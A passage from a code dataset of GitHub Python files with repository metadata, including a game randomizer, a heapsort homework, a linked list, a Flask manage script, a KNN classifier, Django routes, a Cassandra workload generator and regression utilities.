format_entry(mso, right, short=True)\n line = '{0} {1}'.format(leftstr, rightstr)\n line = line.rstrip() + '\\n'\n short_message += line\n\n new_message = new_message.rstrip() + '$NOCOLOR$'\n short_message = short_message.rstrip() + '$NOCOLOR$'\n\n old_message = messages[len(new_messages)]\n length = len(NameMixin.convert_from_str(new_message))\n shortlength = len(NameMixin.convert_from_str(short_message))\n if length <= len(old_message):\n new_message += ' ' * (len(old_message)-length)\n new_messages.append(new_message)\n elif shortlength <= len(old_message):\n short_message += ' ' * (len(old_message)-shortlength)\n new_messages.append(short_message)\n else:\n shortest_message = '???$NOCOLOR$'\n shortest_message += ' ' * (len(old_message) - 4)\n new_messages.append(shortest_message)\n assert (len(NameMixin.convert_from_str(new_messages[-1]))\n == len(old_message))\n\n new_messages = [NameMixin.convert_from_str(m) for m in new_messages]\n target_length = sum([len(m) for m in messages])\n current_length = sum([len(m) for m in new_messages])\n assert current_length == target_length\n assert len(messages) == len(new_messages)\n\n new_data = b'\\x00'.join(new_messages)\n f.seek(addresses.master_list_afldkwa)\n f.write(new_data)\n f.close()\n f = get_open_file('BIN/ETC/FIRST.EMI', sandbox=True)\n f.seek(addresses.master_list_first)\n f.write(new_data)\n f.close()\n\n\nif __name__ == '__main__':\n try:\n print('You are using the Breath of Fire III randomizer,\\n'\n '\"The Vast and the Violent\", version %s.\\n' % VERSION)\n\n ALL_OBJECTS = [g for g in globals().values()\n if isinstance(g, type) and issubclass(g, TableObject)\n and g not in [TableObject]]\n codes = {\n 'easymodo': ['easymodo'],\n 'equipanything': ['equipanything'],\n 'feyday': ['feyday', 'faeday'],\n 'thinkwell': ['thinkwell'],\n 'bluemagician': ['bluemagician', 'bluemage'],\n 'abilonym': ['abilonym'],\n }\n run_interface(ALL_OBJECTS, snes=False, codes=codes,\n custom_degree=True, custom_difficulty=True)\n\n if 'bluemagician' in get_activated_codes():\n print('SKILL EXAMINE CODE ACTIVATED')\n activate_blue_magician_code()\n\n if 'thinkwell' in get_activated_codes():\n print('FOUNTAIN PEN CODE ACTIVATED')\n\n if 'equipanything' in get_activated_codes():\n print('EQUIP ANYTHING CODE ACTIVATED')\n\n if 'easymodo' in get_activated_codes():\n print('DEBUG MODE ACTIVATED')\n\n if 'feyday' in get_activated_codes():\n feytxt = input('Faerie names text file? ')\n activate_feyday(feytxt)\n\n if 'abilonym' in get_activated_codes():\n abiltxt = input('Ability names text file? ')\n activate_abilonym(abiltxt)\n\n write_seed_number()\n rewrite_master_list()\n clean_and_write(ALL_OBJECTS)\n\n write_spoiler(ALL_OBJECTS)\n write_cue_file()\n\n finish_interface()\n\n except Exception:\n print(format_exc())\n input('Press Enter to close this program. ')\n","repo_name":"abyssonym/vast_violence","sub_path":"randomizer.py","file_name":"randomizer.py","file_ext":"py","file_size_in_byte":74593,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"79"} +{"seq_id":"1321787534","text":"# Bao Tran Do\n# May 10, 2021\n# HW5 \n# This algorithm is for building a max heap since we want the array to have \n# ascending order \n# Source of the algorithm https://en.wikipedia.org/wiki/Heapsort\n\n\n\n# Sort the array of the given size \ndef heapSort(arr):\n\n\tlength = len(arr)\n\tindex0 = 0\n\n\t\n\t# largest value located at the root \n\theapify(arr,length)\n\t\n\tend = length - 1\n\n\twhile end > 0:\n\n\t\t# swap the first element and the last element. The first element will no longer be consider\n\t\t# in the array since it is located at the end of the array for the max heap\n\t\tswap(arr, end, index0) \n\t\t# reduced the heap size by one \n\t\tend = end - 1\n\t\t\n\t\t# restore the heap property to make sure it is still a heap \n\t\tshiftDown(arr, index0 , end)\n\t\t\n\treturn arr \n\n# Want to have the elements in heap order\ndef heapify(arr,count):\n\t# Find the parent of the last element \n\tstart = getParent(count - 1)\n\n\t# Shift the element until all the nodes below the start index are in heap order \n\twhile start >= 0:\n\t\t\n\t\tshiftDown(arr, start, count - 1)\n\n\t\t# get the next parent node\n\t\tstart = start - 1\n\t\n\n# This is to restore the heap \ndef shiftDown(arr, start, end): \n\n\troot = start\n\n\t# Assuming that the root has at least 1 child \n\twhile getLeftChild(root) <= end:\n\t\tchild = getLeftChild(root)\n\t\tswapChild = root \n\t\n\t\t# if the root value is smaller than the left child swap \n\t\tif arr[swapChild] < arr[child]:\n\t\t\tswapChild = child\n\t\t\t\n\t\t# if the root value is smaller than the right child swap \n\t\tif getRightChild(root) <= end and arr[swapChild] < arr[getRightChild(root)]:\n\t\t\tswapChild = getRightChild(root)\n\t\t\t\n\t\t# if the swap child is the same as the root return \n\t\tif swapChild == root:\n\t\t\treturn \n\t\telse: \n\t\t\t# swap the elements \n\t\t\tswap(arr, root, swapChild)\n\t\t\troot = swapChild\n\n\n# This function perform the swapping of the 2 elements \ndef swap(arr, firstPosition, secondPosition):\n\tarr[firstPosition], arr[secondPosition] = arr[secondPosition], arr[firstPosition]\n\treturn arr\n\n# This is getting the index of the parent\ndef getParent(index):\n\treturn (index - 1)/2\n\n# This is getting the left child index \ndef getLeftChild(index):\n\treturn 2 * index + 1 \n\n# This is getting the right child index \ndef getRightChild(index):\n\treturn 2 * index + 2\n\n\n\n# Test case\ntest1 = []\ntest2 = [0]\ntest3 = [10,1]\ntest4 = [1,10]\ntest5 = [1,2,3,4,5,6]\ntest6 = [1,2,3,4,5,6,7]\ntest7 = [6,5,4,3,2,1]\ntest8 = [7,6,5,4,3,2,1]\ntest9 = [20,11,17,3,6,2]\ntest10 = [20,1,4,21,24]\n\nprint('{:>60}'.format('Test Cases for max heapSort algorithm'))\nprint('--------------------------------------------------------------------------')\nprint('{:>25} {:>40}'.format('cases', 'sorted' + '\\n')) \nprint('{:>25} {:>40}'.format(str(test1), str(heapSort(test1)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test2), str(heapSort(test2)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test3), str(heapSort(test3)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test4), str(heapSort(test4)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test5), str(heapSort(test5)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test6), str(heapSort(test6)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test7), str(heapSort(test7)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test8), str(heapSort(test8)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test9), str(heapSort(test9)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test10), str(heapSort(test10)) + '\\n')) \n\n\n\n\n\n\n\n","repo_name":"trando46/Projects","sub_path":"Python/bdo_hw5.py","file_name":"bdo_hw5.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30031178301","text":"import numpy as np\nfrom bokeh.plotting import *\n\nN = 100\nx = np.linspace(0, 4*np.pi, N)\ny0 = np.sin(x)\ny1 = np.cos(x)\ny2 = np.sin(x) + np.cos(x)\n\ndef main():\n\ts1 = figure(width=250, plot_height=250, title=None)\n\ts1.circle(x, y0, size=10, color=\"navy\", alpha=0.5)\n\n\ts2 = figure(width=250, plot_height=250, title=None)\n\ts2.circle(x, y1, size=10, color=\"firebrick\", alpha=0.5)\n\n\ts3 = figure(width=250, plot_height=250, title=None)\n\ts3.circle(x, y2, size=10, color=\"olive\", alpha=0.5)\n\n\tp = gridplot([[s1, s2, s3]], toolbar_location=None)\n\n\tshow(p)\n\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"nikos-daniilidis/bokeh-starter","sub_path":"getting_started_3.py","file_name":"getting_started_3.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14590182940","text":"# doubly linkedlist is a linear data structure in which elements are \n# not stored at contiguous memory locations\n\n# In simple words, it consists of nodes where each node contains a data field \n# and a referecne to the next node and to previous in the list.\n\n\"\"\"\ndoubly linked list can be visiualized as a drawing below\n\nex)\n \n-pointer \"next\" is denoted as \"->\" \n-pointer \"prev\" is denoted as \"<-\"\n-NULL is the same as NONE\n\nHEAD -> |---DATA---| -> |---DATA---| -> |---DATA---|-> NULL\n |----------| |----------| |----------|\n <- |----------| <- |----------| <- |----------|\n\n Head <- |prev Tail next| -> LastNode \n \n\"\"\"\nclass Node:\n\n def __init__(self,data = None):\n self.data = data\n self.next = None\n self.prev = None\n pass\n\n\nclass Linkedlist():\n\n\n def __init__(self):\n \n self.head = Node()\n self.tail = Node()\n self.size = 0\n pass\n \n def displayFromFirstElement(self):\n\n currNode = self.head\n\n while currNode:\n\n print(currNode.data)\n currNode = currNode.next\n \n # display elements in linkedlist from the last element\n \n def displayFromLastElement(self):\n\n lastNode = self.tail.next \n \n while lastNode:\n\n print(lastNode.data)\n lastNode = lastNode.prev\n\n \n\n \n # add new node to right next to the head\n \n def appendToFirst(self,data):\n \n\n if self.size == 0:\n newNode = Node(data)\n self.head.next = newNode\n self.tail.next = newNode\n self.tail.prev = self.head\n \n\n self.size += 1\n\n else:\n \n firstNode = self.head.next\n newNode = Node(data)\n self.head.next = newNode\n newNode.next = firstNode\n firstNode.prev = newNode\n newNode.prev = self.head\n self.tail.prev = self.head\n self.size += 1\n\n return 0\n \n\n\n\n \n \n\n # remove the node that contains the same data as given data\n # remember to point to prevNode and nextNode\n \n def remove(self,data):\n \n node = self.head\n size = self.size\n\n if self.size > 0:\n\n while node is not None:\n \n \n\n if node.data == data:\n\n if node == self.tail.next:\n node = node.prev\n node.next = None\n self.tail.next = node\n self.tail.prev = self.head\n self.size -= 1\n break\n\n if node == self.head.next:\n node = node.next\n self.head.next = node\n node.prev = self.head\n self.size -= 1\n break\n \n else:\n\n prevNode = node.prev\n nextNode = node.next\n node = nextNode\n nextNode.prev = prevNode\n prevNode.next = nextNode\n self.size -= 1\n\n node = node.next\n \n else:\n return -1\n\n \n\n \n\n \n return 0\n \n def appendToEnd(self,data):\n\n if self.size == 0:\n node = Node(data)\n\n self.head.next = node\n node.prev = self.head\n self.tail.next = node\n self.tail.prev = self.head\n \n self.size += 1\n\n else:\n\n \n lastNode = self.tail.next\n node = Node(data)\n lastNode.next = node\n node.prev = lastNode\n self.tail.next = node\n self.tail.prev = self.head\n\n self.size += 1\n\n \"\"\"\n lastNode = self.tail.next\n node = Node(data)\n node = self.tail.next\n node.prev = lastNode\n lastNode.next = node\n self.tail.next = node\n self.tail.prev = self.head\n\n self.size += 1\n \"\"\"\n\n \n return 0\n \n\n # return length of linkedlist\n def legnth(self):\n\n\n\n return self.size\n\n \n ","repo_name":"deanyim0226/data_structure","sub_path":"doublyLinkedlist.py","file_name":"doublyLinkedlist.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6073666985","text":"# manage.py\n\n\nimport os\nimport unittest\nimport coverage\n\nfrom flask_script import Manager\nfrom flask_migrate import Migrate, MigrateCommand\n\nfrom api import models\nfrom api.models import User\nfrom api.auth import views\n\nCOV = coverage.coverage(\n branch=True,\n include='project/*',\n omit=[\n 'project/tests/*',\n 'project/server/config.py',\n 'project/server/*/__init__.py'\n ]\n)\nCOV.start()\n\nfrom api import app, db, models\n\nmigrate = Migrate(app, db)\nmanager = Manager(app)\n\n# migrations\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef test():\n \"\"\"Runs the unit tests without test coverage.\"\"\"\n tests = unittest.TestLoader().discover('tests', pattern='test*.py')\n result = unittest.TextTestRunner(verbosity=2).run(tests)\n if result.wasSuccessful():\n return 0\n return 1\n\n\n@manager.command\ndef cov():\n \"\"\"Runs the unit tests with coverage.\"\"\"\n tests = unittest.TestLoader().discover('project/tests')\n result = unittest.TextTestRunner(verbosity=2).run(tests)\n if result.wasSuccessful():\n COV.stop()\n COV.save()\n print('Coverage Summary:')\n COV.report()\n basedir = os.path.abspath(os.path.dirname(__file__))\n covdir = os.path.join(basedir, 'tmp/coverage')\n COV.html_report(directory=covdir)\n print('HTML version: file://%s/index.html' % covdir)\n COV.erase()\n return 0\n return 1\n\n\n@manager.command\ndef create_db():\n \"\"\"Creates the db tables.\"\"\"\n db.create_all()\n\n\n@manager.command\ndef drop_db():\n \"\"\"Drops the db tables.\"\"\"\n db.reflect()\n db.drop_all()\n\n\n@manager.command\ndef register_first():\n \"\"\"Register new user\"\"\"\n email = raw_input(\"Please enter email: \")\n password = getpass.getpass(\"Enter Password:\")\n user = User.query.filter_by(email=email).first()\n if not user:\n try:\n user = User(\n email=email,\n password=password\n )\n db.session.add(user)\n db.session.commit()\n except Exception as e:\n responseObject = {\n 'status': 'fail',\n 'message': 'Some error occurred. Please try again.'\n }\n\n\nif __name__ == '__main__':\n manager.run()\n","repo_name":"lampwins/orangengine-ui","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"29610241723","text":"#####\n# Author: Manuel Galli\n# e-mail: gmanuel89@gmail.com / manuel.galli@revvity.com\n# Updated date: 2023-07-20\n#####\n\n## Import libraries\nimport sys, subprocess, traceback\n\n\n## Install required packages\ndef install_required_packages_from_file(requirements_file_path = './requirements.txt') -> bool:\n # Initialise output\n required_packages_installed = False\n try:\n # Install\n python = sys.executable\n subprocess.check_call([python, '-m', 'pip', 'install', '-r', requirements_file_path], stdout=subprocess.DEVNULL)\n required_packages_installed = True\n except:\n traceback.print_exc()\n # return\n return required_packages_installed","repo_name":"gmanuel89/Python-packages","sub_path":"common/install_required_packages_from_file.py","file_name":"install_required_packages_from_file.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"5285814571","text":"import numpy as np\n\n\nclass KNearestNeighbor:\n def __init__(self):\n pass\n\n def fit(self, X, y):\n self.X_train = X\n self.y_train = y\n\n def compute_distances_two_loops(self, X):\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n for i in range(num_test):\n for j in range(num_train):\n dists[i][j] = np.sqrt((X[i] - self.X_train[j]) @ (X[i] - self.X_train[j]).T)\n return dists\n\n def compute_distances_one_loop(self, X):\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n for i in range(num_test):\n row_dists = X[i, :] - self.X_train\n dists[i, :] = np.sqrt(np.sum(row_dists * row_dists, axis=1))\n return dists\n\n def compute_distances_no_loops(self, X):\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n sub = np.expand_dims(X, axis=1) - np.expand_dims(self.X_train, axis=0)\n dists = np.sqrt(np.sum(sub * sub, axis=2))\n return dists\n\n def predict(self, X, k=5, num_loops=0):\n if num_loops == 2:\n dists = self.compute_distances_two_loops(X)\n elif num_loops == 1:\n dists = self.compute_distances_one_loop(X)\n elif num_loops == 0:\n dists = self.compute_distances_no_loops(X)\n else:\n raise ValueError(f'Invalid value {num_loops} for num_loops')\n return self.predict_labels(dists, k)\n\n def predict_labels(self, dists, k=1):\n num_test = dists.shape[0]\n y_pred = np.zeros(num_test)\n for i in range(num_test):\n top_k_args = np.argsort(dists[i])[:k]\n closest_y = self.y_train[top_k_args]\n y_pred[i] = np.bincount(closest_y).argmax()\n return y_pred\n","repo_name":"NikOrlov/ml_made","sub_path":"HW01/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14674584308","text":"from django.urls import path, include\n\nimport customers.views\n\napp_name = 'customers'\n\ndebit_urlpatterns = [\n path('', customers.views.DebitView.as_view(), name='debit'),\n path('edit', customers.views.DebitEditView.as_view(), name='debit-edit'),\n path('delete', customers.views.DebitDeleteView.as_view(), name='debit-delete')\n]\n\ncustomer_urlpatterns = [\n path('', customers.views.CustomerDetailView.as_view(), name='customer'),\n path('edit', customers.views.CustomerEditView.as_view(), name='customer-edit'),\n path('debit', customers.views.DebitAddView.as_view(), name='customer-debit'),\n path('debit/-/', include(debit_urlpatterns)),\n]\nurlpatterns = [\n path('', customers.views.CustomersListView.as_view(), name='index'),\n path('create', customers.views.CustomerCreateView.as_view(), name='create'),\n path('/', include(customer_urlpatterns))\n]\n","repo_name":"comargo/milkshop","sub_path":"customers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40299895604","text":"menuList = []\n\ndef BillMenu():\n total = 0\n print(\"Your order\".center(16, \"-\"))\n for i in range(len(menuList)):\n print(menuList[i][0], \"ราคา\", menuList[i][1], \"บาท\")\n total += menuList[i][1]\n print(\"ราคาทั้งหมดรวม\", total, \"บาท\")\n\nwhile True:\n menuName = input(\"Please Enter Menu : \")\n if menuName.lower() == \"exit\":\n break\n else:\n menuPrice = int(input(\"Please Enter Price : \"))\n menuList.append([menuName, menuPrice])\nprint(menuList)\nBillMenu()\n\n","repo_name":"LaWRInG/CP3-Naruebase-Polagoth","sub_path":"Lecture72.py","file_name":"Lecture72.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39730718340","text":"import numpy as np\nimport pandas as pd\nimport sys\nimport random\nimport time\nimport uuid\nimport string\n\nsystem_size = 2500000000\n\ndef sys_main(row_size):\n\n random.seed(time.time())\n\n row_num = int(system_size / row_size)\n col_name = ['y_id']\n field_size = int(row_size / 10)\n\n # creat 10 cols\n for i in range(0, 10):\n field_name = 'field' + str(i)\n col_name.append(field_name)\n\n payloads = []\n payloads_size = 100\n for i in range(0, payloads_size):\n payload = ''.join([random.choice(string.ascii_letters + string.digits) for nn in range(field_size)])\n payloads.append(payload)\n\n # creat dataframe\n df = pd.DataFrame(columns=col_name)\n for i in range(0, row_num):\n if i % 1000 == 0:\n print(i, row_num, int(i/row_num*100), '%')\n new_col = [uuid.uuid1()]\n for j in range(1, 11):\n payload = random.sample(payloads, 1)[0]\n new_col.append(payload)\n df_t = pd.DataFrame([new_col], columns=col_name)\n df = pd.concat([df, df_t], ignore_index=True)\n\n df.to_csv('cassdataset.csv', sep=',', index=0)\n ids = df['y_id']\n ids.to_csv('y_id.csv', sep=',', index=0, header=True)\n return 0\n\n\nif __name__ == '__main__':\n print('workload generator starts.')\n row_size = int(sys.argv[1])\n sys_main(row_size=row_size)\n print('workload is finished!')\n","repo_name":"daniarherikurniawan/Cassandra-QoE","sub_path":"CassandraCodes/workload_generator.py","file_name":"workload_generator.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12796146547","text":"from keras.wrappers.scikit_learn import KerasRegressor\nimport numpy as np\nfrom sklearn.model_selection import train_test_split, TimeSeriesSplit\nfrom sklearn.feature_selection import SelectFromModel, RFECV\nfrom autolrn.encoding import labelenc as lc\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.metrics import mean_squared_error, explained_variance_score\nfrom sklearn.metrics import r2_score, mean_squared_log_error, make_scorer\nfrom time import time\nfrom . import param_grids_distros as pgd\nfrom . import neuralnets as nn\nfrom .. import auto_utils as au\nfrom autolrn.classification import eval_utils as eu\nfrom random import randint\nfrom scipy.stats import randint as sp_randint\nfrom sklearn.svm import LinearSVR\nfrom pandas import DataFrame\nfrom sklearn.base import is_regressor\nfrom sklearn.pipeline import Pipeline\n\nEPSILON = np.finfo(float).eps \n\n\ndef custom_rms_log_err(y_true, y_pred):\n \"\"\"\n Root mean squared log error\n\n ---\n\n y_true: target date\n y_pred: predicted data\n \"\"\"\n assert len(y_true) == len(y_pred)\n if (y_true < 0).any() or (y_pred < 0).any():\n raise ValueError(\n \"Root Mean Squared Logarithmic Error cannot be used when \"\n \"targets contain negative values.\")\n # msle = mean_squared_error(np.log1p(y_true), np.log1p(y_pred))\n msle = mean_squared_log_error(y_true, y_pred)\n return np.sqrt(msle)\n\n\n# carefully prepare your target before using this...\ndef custom_rms_perc_err(y_true, y_pred):\n \"\"\"\n Root mean squared percentage error\n\n ---\n\n y_true: target date\n y_pred: predicted data\n \"\"\"\n assert len(y_true) == len(y_pred)\n if (y_true == 0).any():\n raise ZeroDivisionError(\n \"Root Mean Squared Percentage Error\"\n \"cannot be used when targets contain zeros\")\n\n # mspe = np.mean(np.square((y_true - y_pred)/np.clip(y_true, EPSILON, 1.)))\n mspe = np.mean(np.square((y_true - y_pred)/y_true))\n return np.sqrt(mspe)\n\n\ndef get_custom_scorer(scoring=None, y_train=None):\n # check scoring and y_train exist\n scorer=None\n if scoring == \"neg_rmsle\":\n if (y_train < 0).any():\n raise ValueError(\n \"Root Mean Squared Logarithmic Error cannot be used when \"\n \"targets contain negative values.\")\n else:\n scorer = make_scorer(\n custom_rms_log_err, greater_is_better=False\n )\n elif scoring == \"neg_rms_perc_err\":\n if (y_train == 0).any():\n raise ZeroDivisionError(\n \"Root Mean Squared Percentage Error cannot be used when \"\n \"targets contain zeros.\")\n else:\n scorer = make_scorer(\n custom_rms_perc_err, greater_is_better=False\n )\n else: \n scorer = scoring\n\n return scorer\n\n\ndef split_and_encode_Xy(\n X, y, encoding='le', feat_scaler=True, tgt_scaler=True, \n freqs=None, dummy_cols=10, ohe_dates=False,\n test_size=.25, feat_select=True, shuffle=True, enc_Xy=False, \n X_test=None, scoring='r2'):\n \"\"\"\n Splits X, y into train and test sub sets, encode them\n\n ---\n\n shuffle: set it to False to preserve items order\n \"\"\"\n X_train, y_train, y_test = (None, None, None)\n # do not shuffle the data before splitting to respect row order\n if not enc_Xy:\n # check X, y are valid dataframes or numpy arrays...\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=test_size, shuffle=shuffle)\n else:\n print()\n print(\"Encoding full data set 'X' -> 'X_train'\")\n X_train = X\n y_train = y\n\n print(\"Let's have a look at the first row and output\")\n print(\"X_train\\n\", X_train.head())\n print(\"y_train\\n\", y_train.head())\n print()\n\n if list(X.select_dtypes(include=[\"datetime\"]).columns):\n print(\"datetime type found.\")\n X_train = lc.get_date_features(X_train, freqs)\n if X_test is not None:\n X_test = lc.get_date_features(X_test, freqs)\n\n # print(X_train[\"Month\"].head(3))\n\n if encoding == 'le':\n X_train = lc.dummy_encode(X_train.copy()).astype(np.float32)\n if X_test is not None:\n X_test = lc.dummy_encode(X_test.copy()).astype(np.float32)\n elif encoding == 'ohe':\n # do this for mixed label-onehot encoding !\n # X_train.reset_index(drop=True, inplace=True)\n # X_test.reset_index(drop=True, inplace=True)\n\n X_train = lc.get_dummies_or_label_encode(\n X_train.copy(), dummy_cols=dummy_cols, \n ohe_dates=ohe_dates).astype(np.float32)\n # print(\"oheencoded X_train['month'] \\n\", X_train[\"Month\"].head(3))\n\n if X_test is not None:\n X_test = lc.get_dummies_or_label_encode(\n X_test.copy(), dummy_cols=dummy_cols, \n ohe_dates=ohe_dates).astype(np.float32)\n\n X_test = eu.reorder_ohencoded_X_test_columns(X_train, X_test)\n else:\n raise ValueError(\n \"%r is not a valid value for var 'encoding', \\n\"\n \"valid values are in ['le', 'ohe']\" % encoding)\n\n print()\n\n if X_train.isnull().values.any():\n X_train = X_train.fillna(X_train.median())\n\n if X_test is not None and X_test.isnull().values.any():\n X_test = X_test.fillna(X_test.median())\n\n print(\"After encoding, first row and output\")\n print(\"X_train\\n\", X_train.head())\n print(\"X_train.columns\\n\", list(X_train.columns))\n print(\"y_train\\n\", y_train.head())\n print()\n\n scalers = (None, None)\n data_and_scalers = {\"scalers\": scalers}\n\n if feat_scaler:\n\n print(\"scaling train and test data\")\n\n scaler = StandardScaler()\n # you're going to perform scaling at training time before finalization\n if not enc_Xy:\n X_train_scaled = scaler.fit_transform(X_train)\n X_train = DataFrame(\n data=X_train_scaled, columns=X_train.columns, index=X_train.index)\n \n print()\n print(\"X_train shape:\", X_train.shape)\n if X_test is not None:\n X_test_scaled = scaler.transform(X_test)\n X_test = DataFrame(\n data=X_test_scaled, columns=X_test.columns, index=X_test.index)\n print(\"X_test shape:\", X_test.shape)\n \n print()\n print(\"After scaling...\")\n print(\"X_train\\n\", X_train[:1])\n print(\"X_train type\", type(X_train))\n if X_test is not None:\n print(\"X_test\\n\", X_test[:1])\n print(\"X_test type\", type(X_test))\n print()\n\n scalers = (scaler, None)\n data_and_scalers[\"scalers\"] = scalers\n\n print(\"scoring:\", scoring)\n # tgt_scaler = False if scoring == 'neg_rmsle' else True\n # standard scaling introduces negative values, \n # which can't be fed to log, hence to rmsle\n\n if tgt_scaler:\n print(\"Scaling target...\")\n\n if scoring != 'neg_rmsle':\n y_scaler = StandardScaler()\n y_train = y_scaler.fit_transform(y_train.values.reshape(-1,1)).ravel()\n else:\n y_scaler = MinMaxScaler()\n y_train = y_scaler.fit_transform(y_train.values.reshape(-1,1))\n\n print(\"y_train and its type\\n\", (y_train[:1], type(y_train)))\n\n if not enc_Xy:\n if scoring != 'neg_rmsle':\n y_test = y_scaler.transform(y_test.values.reshape(-1,1)).ravel()\n else:\n y_test = y_scaler.fit_transform(y_test.values.reshape(-1,1))\n\n print(\"y_test and its type\\n\", (y_test[:3], type(y_test)))\n\n scalers = (scalers[0], y_scaler)\n data_and_scalers[\"scalers\"] = scalers\n\n print()\n\n # this works for classifiers\n # featsel_tuple = eu.create_feature_selector(X_train, None, seed)\n\n if feat_select and X_train.shape[1] > 10:\n\n lsvr = LinearSVR(max_iter=1e4)\n lsvr = lsvr.set_params(\n C=0.01, loss=\"squared_epsilon_insensitive\", dual=False)\n # threshold=[1e-2, 1e-1] or in [\"mean\", \"median\"]\n thsd = \"median\" # \"median\", \"median\"\n featselector = SelectFromModel(lsvr, threshold=thsd)\n # tscv_fs = TimeSeriesSplit(n_splits=5)\n # featselector = RFECV(lsvr, step=1, cv=tscv_fs)\n\n data_and_scalers[\"f_selector\"] = featselector\n\n if not enc_Xy:\n # featselector = featsel_tuple[1]\n X_train_selected = featselector.fit_transform(X_train, y_train)\n xtr_indices = featselector.get_support()\n X_train = DataFrame(\n data=X_train_selected, \n columns=X_train.columns[xtr_indices], \n index=X_train.index)\n\n print(\"After feature selection...\")\n print(\"X_train shape:\", X_train.shape)\n if X_test is not None:\n X_test_selected = featselector.transform(X_test)\n xtt_indices = featselector.get_support()\n X_test = DataFrame(\n data=X_test_selected, \n columns=X_test.columns[xtt_indices], \n index=X_test.index)\n\n print(\"X_test shape:\", X_test.shape)\n\n data_and_scalers[\"data\"] = (X_train, X_test, y_train, y_test) \n \n return data_and_scalers\n\n\ndef create_keras_regressors(input_dim, nb_epoch, batch_size, single_nn=None):\n\n keras_Reg_fcts = dict(\n baseline_nn_default_Reg=(nn.baseline_nn_model, {}),\n baseline_nn_smaller_Reg=(nn.baseline_nn_smaller_model, {}),\n larger_nn_Reg=(nn.larger_nn_model, {}),\n deep_nn_Reg=(nn.deep_nn_model, {}),\n deeper_nn_Reg=(nn.deeper_nn_model, {})\n )\n\n names_and_models = dict()\n\n if single_nn is None:\n \n if input_dim < 15:\n keras_Reg_fcts['larger_deep_nn_Reg'] = (nn.larger_deep_nn_model, {})\n \n for k, v in keras_Reg_fcts.items():\n names_and_models[k] = (KerasRegressor(\n build_fn=v[0], nb_epoch=nb_epoch,\n input_dim=input_dim, batch_size=batch_size,\n verbose=0), {})\n\n elif single_nn is not None and single_nn in keras_Reg_fcts:\n if single_nn=='larger_deep_nn_Reg' and input_dim >= 15:\n print(\n \"input_dim = %d; not advisable to use %s\" % single_nn)\n print(\"Switching to smaller model 'deeper_nn_Reg'\")\n single_nn = 'deeper_nn_Reg'\n else:\n pass\n names_and_models[single_nn] = KerasRegressor(\n build_fn=keras_Reg_fcts[single_nn], nb_epoch=nb_epoch,\n input_dim=input_dim, batch_size=batch_size,\n verbose=0), {}\n else:\n ValueError(\n \"%s is not valid value for 'single_nn', valid values are \"\n \"[None, 'baseline_nn_default_Reg', 'baseline_nn_smaller_Reg'\" \n \"'larger_nn_Reg', 'deep_nn_Reg', 'deeper_nn_Reg', \"\n \"'larger_deep_nn_Reg']\")\n\n return names_and_models\n\n\ndef create_best_keras_reg_architecture(\n keras_reg_name, input_dim, nb_epoch, keras_param_grid):\n \"\"\"\n Tune KerasReg's hyperparameters using Randomized Search CV\n\n ------\n \"\"\"\n\n for n in np.arange(0, 3):\n keras_param_grid[keras_reg_name + '__units_' + str(n)] = sp_randint(\n input_dim, 5*input_dim)\n\n keras_nn_model = KerasRegressor(\n build_fn=nn.tunable_deep_nn, nb_epoch=nb_epoch,\n input_dim=input_dim, verbose=0)\n\n return keras_nn_model, keras_param_grid\n\n\ndef best_regressor_attributes(scoring=None):\n\n best_model_name = 'Worst'\n best_model = None\n best_reg_score = -np.inf\n best_reg_std = np.inf\n\n best_attributes = best_model_name, best_model, best_reg_score, best_reg_std\n\n return best_attributes\n\n\ndef set_features_params_for_model(\n X_train=None, time_dep=False, cv=3, model_name=None, model=None, \n tuning='rscv', params=None, seed=0, nb_epoch=10, eval_phase=True):\n if time_dep:\n if not isinstance(cv, TimeSeriesSplit):\n raise TypeError(\n \"'%r' is not a valid type for time series splitting\\n\"\n \"valid type: 'sklearn.model_selection.TimeSeriesSplit'\" %\n type(cv))\n else:\n if not is_regressor(model):\n if not isinstance(model, KerasRegressor):\n raise TypeError(\n \"non-sklearn regressor should be of type KerasRegressor\")\n\n poly_features = None\n\n if model_name == 'Bagging_SVMReg':\n\n # testing phase, ensemble of SVRr w linear 